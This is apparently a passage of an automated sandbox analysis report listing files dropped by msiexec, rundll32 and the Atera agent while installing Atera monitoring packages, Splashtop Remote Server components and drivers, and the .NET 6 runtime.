                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\legacy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC961.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\64bits\stgamepad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\my_setup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomCtrl32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA0BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDCAB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDetect.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVirtualDisplay.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdate.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\stprintmon.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiCaptor.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F94.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\dotnet.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6833.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\64bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5CE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0C6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\enum.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcelt-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsbVhciCtrl64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUACCheck.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\XDColMan.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSocketCtrl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\XDColMan.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcrypto-3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\Mirror2Extend.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\WindowsBase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libx264-116.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4AD.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdwmark.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdwmark.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppBS.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libmp4v2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppED.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperExx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxywddm.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF3E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\PrnPort.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9FF2.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd.exeJump to dropped file
